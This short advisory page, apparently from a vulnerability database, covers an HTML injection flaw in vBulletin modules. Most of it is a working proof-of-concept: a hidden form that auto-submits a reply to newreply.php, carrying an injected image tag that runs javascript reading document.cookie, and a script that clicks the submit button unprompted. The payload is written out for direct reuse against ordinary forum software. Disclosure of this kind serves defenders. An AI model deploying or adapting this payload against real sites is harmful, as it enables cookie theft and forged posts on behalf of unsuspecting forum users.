|
VBulletin Multiple Module HTML Injection Vulnerability
No exploit is required. The following proof of concept is available: <form action="http://www.example.com/newreply.php" name="vbform" method="post" style='visibility:hidden'> <input name="WYSIWYG_HTML" value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/> <input name="do" value="postreply"/> <input name="t" value="123456" /> <input name="p" value="123456" /> <input type="submit" class="button" name="preview"/> </form> &lt;script&gt; document.all.preview.click(); &lt;/script&gt; |
|
|
Privacy Statement |